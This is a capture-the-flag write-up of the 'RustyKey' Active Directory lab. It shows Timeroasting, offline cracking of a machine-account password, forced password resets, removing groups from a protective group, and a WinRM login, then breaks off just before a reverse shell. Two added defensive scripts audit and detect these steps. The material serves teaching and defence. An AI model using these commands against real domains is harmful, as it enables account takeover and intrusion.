RustyKey
Initial credentials: rr.parker / 8#t5HE8L!W3A
1. Information Gathering
1.1. Port Scan
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
49670/tcp open unknown syn-ack ttl 127
49671/tcp open unknown syn-ack ttl 127
49672/tcp open unknown syn-ack ttl 127
49673/tcp open unknown syn-ack ttl 127
49676/tcp open unknown syn-ack ttl 127
49692/tcp open unknown syn-ack ttl 127
49737/tcp open unknown syn-ack ttl 127
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# cat ports |grep '/tcp' |awk '{print $1}'|cut -d '/' -f1|tr '\n' ','|sed 's/,$//'
53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49671,49672,49673,49676,49692,49737
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# nmap 10.10.11.75 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49671,49672,49673,49676,49692,49737 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 01:32 EDT
Nmap scan report for 10.10.11.75
Host is up (0.088s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-29 10:11:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
49737/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-06-29T10:12:11
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 4h39m04s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.42 seconds
1.2. BloodHound
First, validate the credentials given by the challenge:
┌──(root㉿kali)-[~]
└─# nxc ldap 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A'
LDAP 10.10.11.75 389 DC [*] None (name:DC) (domain:rustykey.htb)
LDAP 10.10.11.75 389 DC [-] rustykey.htb\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED
┌──(root㉿kali)-[~]
└─# nxc smb 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A'
SMB 10.10.11.75 445 10.10.11.75 [*] x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.10.11.75 445 10.10.11.75 [-] 10.10.11.75\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED
The login fails, and the banner shows NTLM:False, meaning the target has NTLM authentication disabled.
Testing with Kerberos authentication succeeds:
┌──(root㉿kali)-[~]
└─# nxc smb 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A' -k
SMB 10.10.11.75 445 10.10.11.75 [*] x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.10.11.75 445 10.10.11.75 [-] 10.10.11.75\rr.parker:8#t5HE8L!W3A KDC_ERR_WRONG_REALM
┌──(root㉿kali)-[~]
└─# nxc ldap 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A' -k
LDAP 10.10.11.75 389 DC [*] None (name:DC) (domain:rustykey.htb)
LDAP 10.10.11.75 389 DC [+] rustykey.htb\rr.parker:8#t5HE8L!W3A
It can also be imported.
Configure the hosts file:
10.10.11.75 rustykey.htb dc.rustykey.htb
BloodHound collection:
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# nxc ldap 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A' -k --bloodhound -c all -d rustykey.htb --dns-server 10.10.11.75
LDAP 10.10.11.75 389 DC [*] None (name:DC) (domain:rustykey.htb)
LDAP 10.10.11.75 389 DC [+] rustykey.htb\rr.parker:8#t5HE8L!W3A
LDAP 10.10.11.75 389 DC Resolved collection methods: objectprops, dcom, localadmin, container, group, session, acl, psremote, trusts, rdp
LDAP 10.10.11.75 389 DC Using kerberos auth without ccache, getting TGT
LDAP 10.10.11.75 389 DC Done in 00M 13S
LDAP 10.10.11.75 389 DC Compressing output into /root/.nxc/logs/DC_10.10.11.75_2025-06-29_073914_bloodhound.zip
No direct attack chain was found.
But by analysing the data, we can pick out the objects that are likely to be the next targets.
There are a large number of computer accounts in the domain.
One of them, IT-COMPUTER3, stands out: every other machine has 0 outbound object control entries, whereas it has 6.
IT-COMPUTER3 can add itself to the HELPDESK group, and members of HELPDESK can perform ForceChangePassword on several users.
Moreover, three of those users are members of REMOTE MANAGEMENT USERS and can log in remotely.
Some other valuable users also showed up, such as MM.TURNER, who can perform RBCD on DC.RUSTYKEY.HTB.
That is certainly not our current target, though; it is probably one of the final steps towards root.
Another high-value user is backupadmin, who is a member of the administrators group.
2. Lateral Movement
Based on the analysis above, our next step is most likely to obtain the IT-COMPUTER3$ account.
I know of an enumeration technique that fits this situation well.
Why Timeroast came to mind:
- The box is called RustyKey, a rusty key, which hints at something like an outdated password; one prerequisite for Timeroast is that computer accounts use non-standard or legacy default passwords.
- Timeroast can only recover machine-account hashes, which suits the current environment well.
IppSec showed me a more rigorous approach (checking whether the time the computer password was last changed matches the time the computer was created).
A computer normally gets a very complex password when it is created. From the box author's perspective, setting up a Timeroast challenge requires changing a computer's password to something crackable; otherwise the whole thing would be pointless.
IppSec noticed that the creation time and the password change time did not match, and concluded that Timeroast was probably the intended path here.
https://youtu.be/vkbIVr4_ZdE?t=808
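The creation-time versus password-change-time check described above, written out as an added audit script; this is not code from the writeup or from IppSec's video. It converts the two LDAP attributes (whenCreated is a GeneralizedTime string, pwdLastSet a Windows FILETIME integer) and goes one step further than the single heuristic: because a machine that is really domain-joined rotates its password every 30 days by default, a legitimate live host also has pwdLastSet different from whenCreated, so the script first checks whether the password has rotated within that window and only then classifies a static password as the initial join password or a manual reset. The account names and timestamps in SAMPLE_COMPUTERS are constructed.

```python
from datetime import datetime, timedelta, timezone

# pwdLastSet is a Windows FILETIME: 100 ns ticks since 1601-01-01 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# Default rotation period of Active Directory machine account passwords.
MAX_MACHINE_PASSWORD_AGE = timedelta(days=30)


def filetime_to_datetime(ft: int) -> datetime:
    """Convert a FILETIME integer (LDAP pwdLastSet) to an aware UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse conversion, used below only to build the constructed sample."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def generalized_time_to_datetime(value: str) -> datetime:
    """Parse an LDAP GeneralizedTime such as 20241226101100.0Z (LDAP whenCreated)."""
    return datetime.strptime(value, "%Y%m%d%H%M%S.0Z").replace(tzinfo=timezone.utc)


def audit_computer_passwords(records, now, max_age=MAX_MACHINE_PASSWORD_AGE,
                             tolerance=timedelta(minutes=5)):
    """Return {sAMAccountName: [reason codes]} for computer accounts that need a closer look.

    never-rotated    pwdLastSet is older than the rotation window: the password is static, so
                     an MS-SNTP (Timeroast) hash of it can be cracked offline at leisure.
    initial-password static and set at creation time, i.e. the join/pre-creation password.
    manual-reset     static and set well after creation, i.e. reset by hand and never rotated
                     since (the pattern the writeup describes for IT-COMPUTER3).
    no-password      pwdLastSet is 0 (never set / must change at next logon).
    Accounts whose password rotated inside the window are not reported at all.
    """
    findings = {}
    for rec in records:
        name = rec["sAMAccountName"]
        created = generalized_time_to_datetime(rec["whenCreated"])
        ft = int(rec["pwdLastSet"])
        if ft == 0:
            findings[name] = ["no-password"]
            continue
        pwd_set = filetime_to_datetime(ft)
        if now - pwd_set <= max_age:
            continue  # rotated recently: behaves like a live, domain-joined host
        reasons = ["never-rotated"]
        if pwd_set - created <= tolerance:
            reasons.append("initial-password")
        else:
            reasons.append("manual-reset")
        findings[name] = reasons
    return findings


# Constructed reference time for the audit (the date of the scan in this writeup).
AUDIT_TIME = datetime(2025, 6, 29, 10, 0, tzinfo=timezone.utc)


def _ft(*parts) -> str:
    """pwdLastSet as LDAP returns it: a decimal string. Helper for the sample only."""
    return str(datetime_to_filetime(datetime(*parts, tzinfo=timezone.utc)))


# Constructed LDAP records: the names follow the scheme seen in the writeup, the dates are made up.
SAMPLE_COMPUTERS = [
    # Live machine, password rotated nine days before the audit: nothing to report.
    {"sAMAccountName": "IT-Computer1$", "whenCreated": "20241226101100.0Z",
     "pwdLastSet": _ft(2025, 6, 20, 3, 14, 9)},
    # Never rotated, still on the password it received at creation.
    {"sAMAccountName": "IT-Computer2$", "whenCreated": "20241226101130.0Z",
     "pwdLastSet": _ft(2024, 12, 26, 10, 11, 31)},
    # Reset by hand weeks after creation and never rotated since.
    {"sAMAccountName": "IT-Computer3$", "whenCreated": "20241226101200.0Z",
     "pwdLastSet": _ft(2025, 2, 14, 9, 0, 0)},
    # pwdLastSet of 0.
    {"sAMAccountName": "IT-Computer4$", "whenCreated": "20241226101230.0Z", "pwdLastSet": "0"},
]

if __name__ == "__main__":
    for account, reasons in audit_computer_passwords(SAMPLE_COMPUTERS, AUDIT_TIME).items():
        print(f"{account:15} {', '.join(reasons)}")
```

In a real domain the records would come from an LDAP query for objectClass=computer returning sAMAccountName, whenCreated and pwdLastSet; any account the audit reports as static is one whose password should be rotated (or the account removed if the host no longer exists), which is the mitigation for Timeroast regardless of how strong the password is.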
2.1. Timeroast
┌──(root㉿kali)-[~/…/htb/season8/RustyKey/Timeroast]
└─# python3 timeroast.py 10.10.11.75
1000:$sntp-ms$3cee29dfbcdc366c5c9d0cd27e953e12$1c0111e900000000000a036e4c4f434cec0bd5e51e897488e1b8428bffbfcd0aec0bda6ab699c106ec0bda6ab699e294
1103:$sntp-ms$d9d46c25fc6f896b8868287fa1b866e4$1c0111e900000000000a036e4c4f434cec0bd5e51f575628e1b8428bffbfcd0aec0bda6b6746daafec0bda6b6746fc3d
1104:$sntp-ms$e94f96f97068c1fba1d188aca95fd420$1c0111e900000000000a036e4c4f434cec0bd5e52152aef9e1b8428bffbfcd0aec0bda6b69422e78ec0bda6b69425bc5
1105:$sntp-ms$af79629b8248f5b053f4ff91fc780907$1c0111e900000000000a036e4c4f434cec0bd5e51ebc81fbe1b8428bffbfcd0aec0bda6b6ac499f8ec0bda6b6ac4c08e
1106:$sntp-ms$6dd9da8e7129fbb4af960b5aacf9e81d$1c0111e900000000000a036e4c4f434cec0bd5e5206fb81ee1b8428bffbfcd0aec0bda6b6c77cb12ec0bda6b6c77fbba
1107:$sntp-ms$9ed2b56dd597b5d88decfce3d4c396bd$1c0111e900000000000a036e4c4f434cec0bd5e51de09353e1b8428bffbfcd0aec0bda6b6e013ec4ec0bda6b6e0163ad
1118:$sntp-ms$1cbe7e20162f678abc9fa0c970961089$1c0111e900000000000a036e4c4f434cec0bd5e51fa0b5ede1b8428bffbfcd0aec0bda6b7fa09b15ec0bda6b7fa0c359
1119:$sntp-ms$9d0f1ba81ec3fc23056390a536641264$1c0111e900000000000a036e4c4f434cec0bd5e51fba6846e1b8428bffbfcd0aec0bda6b7fba50c9ec0bda6b7fba75b2
1120:$sntp-ms$9cb4eba806956209232b5bdd261316fe$1c0111e900000000000a036e4c4f434cec0bd5e52118d914e1b8428bffbfcd0aec0bda6b8118b27eec0bda6b8118e9db
1121:$sntp-ms$a45b70e3c9f901ce575cb25fea007b8e$1c0111e900000000000a036e4c4f434cec0bd5e51e963dc4e1b8428bffbfcd0aec0bda6b82aeb158ec0bda6b82aee052
1122:$sntp-ms$8ca7da413399cea53f33acc288a5b79d$1c0111e900000000000a036e4c4f434cec0bd5e5207d749fe1b8428bffbfcd0aec0bda6b8495e686ec0bda6b8496172e
1123:$sntp-ms$5d0c2faf37c4da0d342ae2cbef599650$1c0111e900000000000a036e4c4f434cec0bd5e51e37a8e3e1b8428bffbfcd0aec0bda6b86272a10ec0bda6b86275401
1124:$sntp-ms$602715575db5df815ec6866bb1558bba$1c0111e900000000000a036e4c4f434cec0bd5e51faf31b1e1b8428bffbfcd0aec0bda6b879eb130ec0bda6b879ee02a
1125:$sntp-ms$765ac7d7a6727af434a480b77fc7550b$1c0111e900000000000a036e4c4f434cec0bd5e5216cc5fbe1b8428bffbfcd0aec0bda6b895c3d17ec0bda6b895c711a
1126:$sntp-ms$8bbb3166ec5d7555090b3d526a03f03c$1c0111e900000000000a036e4c4f434cec0bd5e51ef89ab0e1b8428bffbfcd0aec0bda6b8b00af52ec0bda6b8b00daf1
1127:$sntp-ms$7511677fe9fa4fb633889f3138c169d5$1c0111e900000000000a036e4c4f434cec0bd5e520ae8914e1b8428bffbfcd0aec0bda6b8cb698adec0bda6b8cb6c7a7
NetExec's timeroast module can also be used here:
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# nxc smb 10.10.11.75 -M timeroast
SMB 10.10.11.75 445 10.10.11.75 [*] x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)
TIMEROAST 10.10.11.75 445 10.10.11.75 [*] Starting Timeroasting...
TIMEROAST 10.10.11.75 445 10.10.11.75 1000:$sntp-ms$d38d5c0b5b3455d0bce308b310a09fd3$1c0111e900000000000a032f4c4f434cec0d3d472cd57009e1b8428bffbfcd0aec0d417a0cd55f42ec0d417a0cd57bc7
TIMEROAST 10.10.11.75 445 10.10.11.75 1105:$sntp-ms$2e8c228e051ccc06e034d8f0ad22a0e6$1c0111e900000000000a03304c4f434cec0d3d472ac3aa0ee1b8428bffbfcd0aec0d417b12b33a54ec0d417b12b35024
TIMEROAST 10.10.11.75 445 10.10.11.75 1103:$sntp-ms$aa4178da7beab82273eef5ba458d5bca$1c0111e900000000000a03304c4f434cec0d3d472e8b37d7e1b8428bffbfcd0aec0d417b12a3bc32ec0d417b12a3d8b7
TIMEROAST 10.10.11.75 445 10.10.11.75 1104:$sntp-ms$bbe9a87e1bc935053aa6094bd829462b$1c0111e900000000000a03304c4f434cec0d3d472adfa79ae1b8428bffbfcd0aec0d417b12cf2dd0ec0d417b12cf4f5e
TIMEROAST 10.10.11.75 445 10.10.11.75 1106:$sntp-ms$03469059c942dfefce4105045a93cc6c$1c0111e900000000000a03304c4f434cec0d3d472afbe843e1b8428bffbfcd0aec0d417b12eb53a0ec0d417b12eb91b3
TIMEROAST 10.10.11.75 445 10.10.11.75 1107:$sntp-ms$a70b513c4df8f351bf5e4d1f031e87cf$1c0111e900000000000a03304c4f434cec0d3d472b009e8be1b8428bffbfcd0aec0d417b12f0281bec0d417b12f047fc
TIMEROAST 10.10.11.75 445 10.10.11.75 1119:$sntp-ms$ee08832a709f0716e5587f0ba6f465eb$1c0111e900000000000a03304c4f434cec0d3d472b2beb40e1b8428bffbfcd0aec0d417b131b808fec0d417b131b8fa8
TIMEROAST 10.10.11.75 445 10.10.11.75 1118:$sntp-ms$70ed9cab854cdc13074d3367cc7a69f6$1c0111e900000000000a03304c4f434cec0d3d472b2a751ee1b8428bffbfcd0aec0d417b131a0a6dec0d417b131a17d9
TIMEROAST 10.10.11.75 445 10.10.11.75 1120:$sntp-ms$9ed64142ff41010eed5710987273f208$1c0111e900000000000a03304c4f434cec0d3d472b43eb11e1b8428bffbfcd0aec0d417b1333764fec0d417b133392d4
TIMEROAST 10.10.11.75 445 10.10.11.75 1123:$sntp-ms$2be50e07a42d664b41e1e3ff068ff481$1c0111e900000000000a03304c4f434cec0d3d472abaa07ae1b8428bffbfcd0aec0d417b16c2bf2cec0d417b16c2dd5f
TIMEROAST 10.10.11.75 445 10.10.11.75 1125:$sntp-ms$6bb91a165db888273806c5063e224205$1c0111e900000000000a03304c4f434cec0d3d472ad63b0ae1b8428bffbfcd0aec0d417b16de5d18ec0d417b16de7494
TIMEROAST 10.10.11.75 445 10.10.11.75 1126:$sntp-ms$7c5e98e59be2a5ff9f474647f2854f87$1c0111e900000000000a03304c4f434cec0d3d472ae2c12ae1b8428bffbfcd0aec0d417b16eae338ec0d417b16eafab5
TIMEROAST 10.10.11.75 445 10.10.11.75 1121:$sntp-ms$b5329e265eb25bea74b381a57bd2288d$1c0111e900000000000a03304c4f434cec0d3d472ab83f77e1b8428bffbfcd0aec0d417b16c05c7cec0d417b16c07c5c
TIMEROAST 10.10.11.75 445 10.10.11.75 1122:$sntp-ms$d0cf0d85336f5421bc9e8de7b1eaca18$1c0111e900000000000a03304c4f434cec0d3d472ad1683de1b8428bffbfcd0aec0d417b16d98394ec0d417b16d9a374
TIMEROAST 10.10.11.75 445 10.10.11.75 1124:$sntp-ms$5dfbb42d0e489ba7db211b7f9af3aeea$1c0111e900000000000a03304c4f434cec0d3d472ae54061e1b8428bffbfcd0aec0d417b16ed5f13ec0d417b16ed79eb
TIMEROAST 10.10.11.75 445 10.10.11.75 1127:$sntp-ms$d140860524488306176e6926aa7e2cb9$1c0111e900000000000a03304c4f434cec0d3d472affb04ee1b8428bffbfcd0aec0d417b1707c9f8ec0d417b1707eb86
Strip the leading RID and colon, save the hashes to a file, and crack them in bulk with hashcat (the latest hashcat version is required):
D:\Downloads\hashcat-6.2.6+1051\hashcat-6.2.6>hashcat hash.txt rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
31300 | MS SNTP | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
$sntp-ms$765ac7d7a6727af434a480b77fc7550b$1c0111e900000000000a036e4c4f434cec0bd5e5216cc5fbe1b8428bffbfcd0aec0bda6b895c3d17ec0bda6b895c711a:Rusty88!
The RID prefix of this hash is 1125, which corresponds to the account IT-COMPUTER3$.
Verify:
┌──(root㉿kali)-[~/…/season8/RustyKey/Timeroast/extra-scripts]
└─# nxc ldap 10.10.11.75 -u 'IT-COMPUTER3' -p 'Rusty88!' -k
LDAP 10.10.11.75 389 DC [*] None (name:DC) (domain:rustykey.htb)
LDAP 10.10.11.75 389 DC [+] rustykey.htb\IT-COMPUTER3:Rusty88!
┌──(root㉿kali)-[~/…/season8/RustyKey/Timeroast/extra-scripts]
└─# nxc smb 10.10.11.75 -u 'IT-COMPUTER3$' -p 'Rusty88!' -k
SMB 10.10.11.75 445 10.10.11.75 [*] x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.10.11.75 445 10.10.11.75 [-] 10.10.11.75\IT-COMPUTER3$:Rusty88! KDC_ERR_WRONG_REALM
2.2. AddMember
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k --dc-ip 10.10.11.75 add groupMember 'HELPDESK' 'IT-COMPUTER3$'
[+] IT-COMPUTER3$ added to HELPDESK
Members of HELPDESK can then change the passwords of many users. Our next step is clearly to obtain a user who can log in remotely, and these three users can all log in remotely.
However, GG.ANDERSON is disabled, so only the remaining two can be tried.
It also turns out that the IT and SUPPORT groups belong to the PROTECTED OBJECTS group, which in turn belongs to the PROTECTED USERS group.
Members of that group are subject to many restrictions: Kerberos ticket restrictions, legacy authentication protocols such as NTLM disabled, no delegation, no remote interactive logon, and so on.
But since members of the HELPDESK group can perform AddMember on PROTECTED OBJECTS, they can also remove members from it.
So we can remove the IT and SUPPORT groups from PROTECTED OBJECTS and sidestep the protected-group restrictions, such as the restriction on remote logon.
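From the defender's side, the steps in this section leave a clear trail in the Security log on the domain controller. The following detection logic is an added example, not part of the writeup: it runs over constructed Security event records (EventID, SubjectUserName, TargetUserName, MemberName as they appear in the event XML) and flags a principal adding itself to a group, any addition to a group with delegated rights such as HELPDESK, any removal from a protective group such as Protected Users or the nested PROTECTED OBJECTS, and administrative password resets of other accounts (event 4724). The group names are taken from this writeup; the event timestamps and DNs are constructed.

```python
# Windows Security log event IDs for membership changes of security-enabled groups
# (global / local / universal) and for an administrative password reset.
GROUP_ADD_EVENTS = {4728, 4732, 4756}
GROUP_REMOVE_EVENTS = {4729, 4733, 4757}
PASSWORD_RESET_EVENT = 4724

# Groups whose membership protects other principals; a removal deserves the same scrutiny as an add.
# "Protected Users" is the built-in group; "Protected Objects" is the nested group named in the writeup.
PROTECTIVE_GROUPS = {"protected users", "protected objects"}

# Groups that carry delegated rights over other accounts (ForceChangePassword in this domain).
PRIVILEGED_GROUPS = {"helpdesk"}


def cn_from_dn(dn: str) -> str:
    """Return the leaf CN of a distinguished name; event MemberName fields are DNs."""
    leaf = dn.split(",", 1)[0]
    return leaf.split("=", 1)[1] if "=" in leaf else leaf


def same_principal(a: str, b: str) -> bool:
    """Compare account names ignoring case and the trailing '$' of computer accounts."""
    return a.rstrip("$").lower() == b.rstrip("$").lower()


def detect_suspicious_changes(events):
    """Return one alert per event that matches a rule, with the rule names in 'tags'."""
    alerts = []
    for ev in events:
        eid, actor, target = ev["EventID"], ev["SubjectUserName"], ev["TargetUserName"]
        tags = []
        if eid == PASSWORD_RESET_EVENT:
            # 4724: someone reset another account's password (a user changing their own is 4723).
            member = target
            if not same_principal(actor, target):
                tags.append("password-reset-by-other")
        elif eid in GROUP_ADD_EVENTS or eid in GROUP_REMOVE_EVENTS:
            member = cn_from_dn(ev["MemberName"])
            if eid in GROUP_REMOVE_EVENTS and target.lower() in PROTECTIVE_GROUPS:
                tags.append("protective-group-removal")
            if eid in GROUP_ADD_EVENTS:
                if same_principal(actor, member):
                    tags.append("self-add")
                if target.lower() in PRIVILEGED_GROUPS:
                    tags.append("privileged-group-add")
        else:
            continue
        if tags:
            alerts.append({"time": ev["TimeCreated"], "event": eid, "actor": actor,
                           "object": member, "target": target, "tags": tags})
    return alerts


# Constructed events mirroring the sequence in this section, plus two benign ones.
DOMAIN_DN = "DC=rustykey,DC=htb"
SAMPLE_EVENTS = [
    {"TimeCreated": "2025-06-30T13:40:02Z", "EventID": 4728, "SubjectUserName": "IT-COMPUTER3$",
     "MemberName": f"CN=IT-COMPUTER3,CN=Computers,{DOMAIN_DN}", "TargetUserName": "HELPDESK"},
    {"TimeCreated": "2025-06-30T13:41:15Z", "EventID": 4724, "SubjectUserName": "IT-COMPUTER3$",
     "TargetUserName": "BB.MORGAN"},
    {"TimeCreated": "2025-06-30T13:41:40Z", "EventID": 4729, "SubjectUserName": "IT-COMPUTER3$",
     "MemberName": f"CN=IT,OU=Groups,{DOMAIN_DN}", "TargetUserName": "PROTECTED OBJECTS"},
    # Routine change by an administrator to an ordinary group: no alert.
    {"TimeCreated": "2025-06-30T14:02:09Z", "EventID": 4728, "SubjectUserName": "Administrator",
     "MemberName": f"CN=dd.ali,CN=Users,{DOMAIN_DN}", "TargetUserName": "FINANCE"},
    # A user changing their own password (4723) is not in scope.
    {"TimeCreated": "2025-06-30T14:05:33Z", "EventID": 4723, "SubjectUserName": "nn.marcos",
     "TargetUserName": "nn.marcos"},
]

if __name__ == "__main__":
    for alert in detect_suspicious_changes(SAMPLE_EVENTS):
        print(alert["time"], alert["event"], alert["actor"], "->", alert["object"],
              "in", alert["target"], ",".join(alert["tags"]))
```

A computer account appearing as SubjectUserName in any of these events is itself unusual: machine accounts do not normally manage group membership or reset user passwords, so the actor type is a cheap additional filter on top of the rules above.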
2.3. BB.MORGAN
Next, change BB.MORGAN's password, remove the IT group from PROTECTED OBJECTS, then request a TGT for BB.MORGAN and log in with Kerberos authentication.
First change the password and take the group out of the protected group:
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k --dc-ip 10.10.11.75 set password BB.MORGAN Admin123!
[+] Password changed successfully!
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'IT'
[-] IT removed from PROTECTED OBJECTS
Then obtain a TGT for BB.MORGAN to use for Kerberos authentication:
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# impacket-getTGT 'RUSTYKEY.HTB/BB.MORGAN:Admin123!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in BB.MORGAN.ccache
# import the credential cache
export KRB5CCNAME=BB.MORGAN.ccache
/etc/krb5.conf also needs to be configured:
vim /etc/krb5.conf
# add the following
[realms]
    RUSTYKEY.HTB = {
        kdc = dc.rustykey.htb
        admin_server = dc.rustykey.htb
    }
[domain_realm]
    .rustykey.htb = RUSTYKEY.HTB
    rustykey.htb = RUSTYKEY.HTB
Then log in remotely:
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\bb.morgan\desktop> ls
Directory: C:\Users\bb.morgan\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/4/2025 9:15 AM 1976 internal.pdf
-ar--- 6/30/2025 1:38 PM 34 user.txt
internal.pdf is found on the user's desktop.
I simply had GPT analyse it for us.
In short, it grants users in the SUPPORT group extended permissions related to the archiving feature, such as modifying the related registry keys.
Our next step should be to obtain the SUPPORT group user EE.REED and abuse that extended permission.
2.4. Getting a shell as EE.REED with RunasCS
Use RunasCS to switch to the EE.REED user.
First, use the HELPDESK group membership to change EE.REED's password:
┌──(root㉿kali)-[~]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k --dc-ip 10.10.11.75 set password EE.REED Admin123!
[+] Password changed successfully!
The SUPPORT group also has to be removed from PROTECTED OBJECTS:
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'SUPPORT'
[-] SUPPORT removed from PROTECTED OBJECTS
Test with RunasCS first whether commands can be executed as the ee.reed user:
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> .\RunasCS.exe ee.reed Admin123! "cmd /c whoami"
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
rustykey\ee.reed
Then get a reverse shell (it is advisable to run these steps in quick succession):
# change the password
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k --dc-ip 10.10.11.75 set password EE.REED Admin123!
[+] Password changed successfully!
# remove from the protected group
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'SUPPORT'
[-] SUPPORT removed from PROTECTED OBJECTS
# start the listener
┌──(root㉿kali)-[~]
└─# rlwrap nc -lnvp 6666
listening on [any] 6666 ...
# RunasCS reverse shell
